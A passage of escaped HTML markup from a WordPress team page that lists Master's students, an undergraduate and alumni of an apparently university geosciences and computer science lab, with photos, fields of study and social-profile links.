align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c374\" class=\"d-block style-854 style-local-182-c374 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c374-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c374-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c375\" class=\"h-global-transition-all h-heading style-850 style-local-182-c375 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c375\">\n <!---->\n <!---->\n <h4 class=\"\">Angelique Willis</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c376\" class=\"h-text h-text-component style-851 style-local-182-c376 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c377\" class=\"h-text h-text-component style-902 style-local-182-c377 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c378\" class=\"style-855 style-local-182-c378 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c379-outer\">\n <div data-colibri-id=\"182-c379\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c379 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c380\" class=\"d-block style-854 style-local-182-c380 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c380-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c380-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c381\" class=\"h-global-transition-all h-heading style-850 style-local-182-c381 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c381\">\n <!---->\n <!---->\n <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c382\" class=\"h-text h-text-component style-851 style-local-182-c382 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c383\" class=\"h-text h-text-component style-902 style-local-182-c383 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c384\" class=\"style-855 style-local-182-c384 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c168\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c168 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c175\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c175 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c176-outer\">\n <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c176 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-844 style-local-182-c177 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-844 style-local-182-c177\">\n <!---->\n <!---->\n <h2 class=\"\">Undergraduates</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c169\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c169 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c170-outer\">\n <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c170 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c171\" class=\"d-block style-831 style-local-182-c171 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c171-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c171-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-832 style-local-182-c172 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-832 style-local-182-c172\">\n <!---->\n <!---->\n <h4 class=\"\">Joshua Quiroz</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-833 style-local-182-c173 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c174\" class=\"style-835 style-local-182-c174 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c254\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c254 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c280\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c280 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c281-outer\">\n <div data-colibri-id=\"182-c281\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c281 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c282\" class=\"h-global-transition-all h-heading style-926 style-local-182-c282 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-926 style-local-182-c282\">\n <!---->\n <!---->\n <h2 class=\"\">Alumni</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c255\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c255 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c256-outer\">\n <div data-colibri-id=\"182-c256\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c256 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c257\" class=\"d-block style-913 style-local-182-c257 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c257-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c257-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c258\" class=\"h-global-transition-all h-heading style-914 style-local-182-c258 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c258\">\n <!---->\n <!---->\n <h4 class=\"\">Sarah Akinola</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c259\" class=\"h-text h-text-component style-915 style-local-182-c259 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c261\" class=\"style-917 style-local-182-c261 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c262-outer\">\n <div data-colibri-id=\"182-c262\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c262 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c263\" class=\"d-block style-918 style-local-182-c263 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c263-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c263-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c264\" class=\"h-global-transition-all h-heading style-914 style-local-182-c264 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c264\">\n <!---->\n <!---->\n <h4 class=\"\">Anvith Anand</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c265\" class=\"h-text h-text-component style-915 style-local-182-c265 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c267\" class=\"style-919 style-local-182-c267 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c268-outer\">\n <div data-colibri-id=\"182-c268\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c268 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c269\" class=\"d-block style-920 style-local-182-c269 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c269-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c269-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c270\" class=\"h-global-transition-all h-heading style-914 style-local-182-c270 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c270\">\n <!---->\n <!---->\n <h4 class=\"\">Alex Asige</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c271\" class=\"h-text h-text-component style-915 style-local-182-c271 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c273\" class=\"style-921 style-local-182-c273 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c274-outer\">\n <div data-colibri-id=\"182-c274\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c274 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c275\" class=\"d-block style-922 style-local-182-c275 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c275-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c275-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c276\" class=\"h-global-transition-all h-heading style-914 style-local-182-c276 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c276\">\n <!---->\n <!---->\n <h4 class=\"\">Bhavya Busireddy</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c277\" class=\"h-text h-text-component style-915 style-local-182-c277 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c279\" class=\"style-923 style-local-182-c279 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container 